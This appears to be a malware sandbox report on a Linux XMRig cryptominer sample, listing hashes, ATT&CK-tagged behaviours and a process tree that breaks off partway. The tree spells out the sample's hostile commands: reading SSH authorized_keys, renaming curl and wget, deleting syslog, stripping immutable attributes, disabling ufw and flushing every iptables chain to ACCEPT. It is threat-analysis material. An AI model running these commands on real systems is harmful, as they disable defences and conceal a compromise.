xmrig_linux | 3c7faf7512565d86b1ec4fe2810b2006b75c3476b4a5b955f0141d9a1c237d38

Analysis

max time kernel
123s
max time network
132s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-09-2024 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d66aca73387d8ab787f71544777285b5_JaffaCakes118
Size

36KB
MD5

d66aca73387d8ab787f71544777285b5
SHA1

526715af85f935e34b15f124d4b57c8fc37fc1a5
SHA256

3c7faf7512565d86b1ec4fe2810b2006b75c3476b4a5b955f0141d9a1c237d38
SHA512

c9ab083fa7d6a49c333020c13e241303da28afe5a8bd2cf60733fc419ecabef91a9360ac70b5425ee85109367554f3d2a9bf1434dd918ab514fe6ac8800de5ed
SSDEEP

384:x7DQQwQHDf6jlpTWg3vMQ4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeUoJpJyd5:x7kFNc48FkcOYq0xvQGd51ZdAAPPD

Score

10^/10

xmrig_linux defense_evasion discovery evasion execution miner persistence privilege_escalatio privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Adds new SSH keys 1 TTPs 1 IoCs

Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

persistence privilege_escalation

SSH Authorized Keys

T1098.004

description	ioc	Process
File opened for modification	/root/.ssh/authorized_keys	d66aca73387d8ab787f71544777285b5_JaffaCakes118

File and Directory Permissions Modification 1 TTPs 9 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
3388	Process not Found
3394	Process not Found
3396	Process not Found
3400	Process not Found
3370	Process not Found
3376	Process not Found
3383	Process not Found
3391	Process not Found
3398	Process not Found

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Executes dropped EXE 3 IoCs

ioc	pid	Process
/etc/sysupdata	3375	Process not Found
/etc/networkservics	3382	Process not Found
/etc/sysguerd	3390	Process not Found

Flushes firewall rules 9 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
3403	Process not Found
3409	Process not Found
1490	ufw
3402	Process not Found
3404	Process not Found
3406	Process not Found
3408	Process not Found
1667	iptables
2943	Process not Found

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1499	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
3334	Process not Found
3346	Process not Found
2089	xargs
2139	xargs
2198	xargs
2875	Process not Found
2361	xargs
2574	Process not Found
2983	Process not Found
1626	ip6tables
1872	xargs
2041	xargs
2301	xargs
2502	xargs
2508	xargs
3401	Process not Found
1548	iptables
2124	xargs
2307	xargs
2319	xargs
2144	xargs
2187	xargs
2391	xargs
2534	Process not Found
2824	Process not Found
2839	Process not Found
2223	xargs
2510	xargs
2580	Process not Found
2586	Process not Found
2828	Process not Found
2915	Process not Found
1580	iptables
1957	xargs
2465	xargs
2490	xargs
3342	Process not Found
1488	chattr
1760	xargs
2500	xargs
2584	Process not Found
2104	xargs
2129	xargs
2154	xargs
2218	xargs
1517	iptables
1797	xargs
1962	xargs
2057	xargs
2546	Process not Found
2835	Process not Found
3337	Process not Found
2851	Process not Found
2984	Process not Found
2062	xargs
2331	xargs
2426	xargs
2825	Process not Found
2486	xargs
1680	grep
1847	xargs
2007	xargs
2181	xargs
1658	ip6tables

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.qbDkZy	Process not Found

Deletes log files 1 TTPs 2 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File truncated	/var/log/wtmp	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File truncated	/var/log/secure	d66aca73387d8ab787f71544777285b5_JaffaCakes118

Disables AppArmor 36 IoCs

Disables AppArmor security module.

pid	Process
2920	Process not Found
2920	Process not Found
2949	Process not Found
3417	Process not Found
3410	Process not Found
2920	Process not Found
2940	Process not Found
2945	Process not Found
2949	Process not Found
3410	Process not Found
2920	Process not Found
2920	Process not Found
2940	Process not Found
2940	Process not Found
2945	Process not Found
2945	Process not Found
2945	Process not Found
2959	Process not Found
3410	Process not Found
2920	Process not Found
2940	Process not Found
2949	Process not Found
2949	Process not Found
3410	Process not Found
3413	Process not Found
3410	Process not Found
2935	Process not Found
2945	Process not Found
2954	Process not Found
2949	Process not Found
2949	Process not Found
2940	Process not Found
2940	Process not Found
2945	Process not Found
2965	Process not Found
3410	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	2937

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Command and Scripting Interpreter: Unix Shell 1 TTPs 4 IoCs

Execute scripts via Unix Shell.

execution

Unix Shell

T1059.004

pid	Process
3451	Process not Found
3433	Process not Found
3439	Process not Found
3445	Process not Found

Enumerates kernel/hardware configuration 1 TTPs 6 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	Process not Found
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	Process not Found
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	Process not Found
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	Process not Found

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/20/status	ps
File opened for reading	/proc/417/status	ps
File opened for reading	/proc/1069/status	ps
File opened for reading	/proc/404/cmdline	Process not Found
File opened for reading	/proc/24/cmdline	Process not Found
File opened for reading	/proc/1218/status	ps
File opened for reading	/proc/501/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/1468/cmdline	ps
File opened for reading	/proc/35/cmdline	pgrep
File opened for reading	/proc/1184/cmdline	Process not Found
File opened for reading	/proc/642/stat	Process not Found
File opened for reading	/proc/406/status	Process not Found
File opened for reading	/proc/1218/status	Process not Found
File opened for reading	/proc/159/cmdline	Process not Found
File opened for reading	/proc/98/status	Process not Found
File opened for reading	/proc/595/status	ps
File opened for reading	/proc/461/status	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/1099/stat	ps
File opened for reading	/proc/1180/cmdline	ps
File opened for reading	/proc/1135/cmdline	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/1170/status	ps
File opened for reading	/proc/84/stat	ps
File opened for reading	/proc/158/status	ps
File opened for reading	/proc/1243/cmdline	ps
File opened for reading	/proc/454/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/557/cmdline	pgrep
File opened for reading	/proc/938/status	Process not Found
File opened for reading	/proc/1155/cmdline	Process not Found
File opened for reading	/proc/620/cmdline	ps
File opened for reading	/proc/1187/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/1218/status	ps
File opened for reading	/proc/1242/cmdline	Process not Found
File opened for reading	/proc/1143/cmdline	Process not Found
File opened for reading	/proc/7/cmdline	Process not Found
File opened for reading	/proc/323/status	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/164/stat	ps
File opened for reading	/proc/84/cmdline	ps
File opened for reading	/proc/157/cmdline	Process not Found
File opened for reading	/proc/2259/stat	ps
File opened for reading	/proc/266/status	ps
File opened for reading	/proc/406/status	ps
File opened for reading	/proc/502/cmdline	pgrep
File opened for reading	/proc/34/status	Process not Found
File opened for reading	/proc/1143/status	ps
File opened for reading	/proc/1099/cmdline	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/1053/cmdline	ps
File opened for reading	/proc/1164/stat	ps
File opened for reading	/proc/160/cmdline	ps
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/80/status	ps
File opened for reading	/proc/1474/status	Process not Found
File opened for reading	/proc/249/status	ps
File opened for reading	/proc/477/cmdline	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/1129/cmdline	Process not Found
File opened for reading	/proc/85/cmdline	ps

Writes file to tmp directory 35 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileutl.message.csu8sV	Process not Found
File opened for modification	/tmp/fileutl.message.gBYMC8	Process not Found
File opened for modification	/tmp/fileutl.message.oYDYFa	Process not Found
File opened for modification	/tmp/fileutl.message.a4LUgq	Process not Found
File opened for modification	/tmp/fileutl.message.nyq9Tg	Process not Found
File opened for modification	/tmp/kdevtmpfsi	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File opened for modification	/tmp/fileutl.message.aUSDVc	Process not Found
File opened for modification	/tmp/fileutl.message.EoZ23h	Process not Found
File opened for modification	/tmp/fileutl.message.iSIrPf	Process not Found
File opened for modification	/tmp/fileutl.message.qhJjOT	Process not Found
File opened for modification	/tmp/fileutl.message.Y7fxXn	Process not Found
File opened for modification	/tmp/fileutl.message.pwmx8C	Process not Found
File opened for modification	/tmp/fileutl.message.wQ1rqX	Process not Found
File opened for modification	/tmp/fileutl.message.OKWygB	Process not Found
File opened for modification	/tmp/fileutl.message.9rZ0Ne	Process not Found
File opened for modification	/tmp/fileutl.message.iW6ZPd	Process not Found
File opened for modification	/tmp/fileutl.message.yE4dSV	Process not Found
File opened for modification	/tmp/fileutl.message.tVZEQA	Process not Found
File opened for modification	/tmp/fileutl.message.d2eBOU	Process not Found
File opened for modification	/tmp/fileutl.message.yulsdK	Process not Found
File opened for modification	/tmp/fileutl.message.k8nzjM	Process not Found
File opened for modification	/tmp/fileutl.message.wgf5AO	Process not Found
File opened for modification	/tmp/fileutl.message.Hkhkjj	Process not Found
File opened for modification	/tmp/fileutl.message.B252ZW	Process not Found
File opened for modification	/tmp/fileutl.message.8LQL2y	Process not Found
File opened for modification	/tmp/fileutl.message.6lYRBZ	Process not Found
File opened for modification	/tmp/fileutl.message.2re6W1	Process not Found
File opened for modification	/tmp/fileutl.message.mkz7Nz	Process not Found
File opened for modification	/tmp/fileutl.message.EN3UWB	Process not Found
File opened for modification	/tmp/fileutl.message.1gfYOy	Process not Found
File opened for modification	/tmp/dev/null	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File opened for modification	/tmp/redis2	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File opened for modification	/tmp/fileutl.message.4FNu2w	Process not Found
File opened for modification	/tmp/fileutl.message.Uu6vOl	Process not Found
File opened for modification	/tmp/fileutl.message.YkLqdY	Process not Found

Software Deployment Tools 1 TTPs 5 IoCs

Use software deployment tools to execute code.

execution

Software Deployment Tools

T1072

pid	Process
3457	Process not Found
3458	Process not Found
3459	Process not Found
3431	Process not Found
3432	Process not Found

/tmp/d66aca73387d8ab787f71544777285b5_JaffaCakes118
/tmp/d66aca73387d8ab787f71544777285b5_JaffaCakes118
1⤵
- Adds new SSH keys
- Deletes log files
- Writes file to tmp directory
PID:1472
- /bin/sync
  sync
  2⤵
  PID:1473
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:1481
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:1482
- /bin/mv
  mv /usr/bin/curl /usr/bin/url
  2⤵
  PID:1483
- /bin/mv
  mv /usr/bin/url /usr/bin/cdl
  2⤵
  PID:1484
- /bin/mv
  mv /usr/bin/wget /usr/bin/get
  2⤵
  PID:1485
- /bin/mv
  mv /usr/bin/get /usr/bin/wdl
  2⤵
  PID:1486
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1487
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:1488
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1489
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1490
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1496
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1497
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1498
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1499
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1503
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1506
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1507
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1508
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1509
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1510
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1511
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1512
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1513
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1514
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1515
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1516
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1517
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1518
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1519
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1520
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1521
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1522
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1523
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1524
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1525
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1526
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:1548
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1580
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1585
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1586
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1587
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1588
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1589
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1590
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1591
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1592
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1593
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1594
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1595
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1596
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1597
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1598
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1599
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1600
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1601
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1602
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1603
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1604
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1605
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1606
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1607
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1608
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1612
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1616
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1617
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1619
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1622
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1626
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1655
  - - /sbin/ip6tables
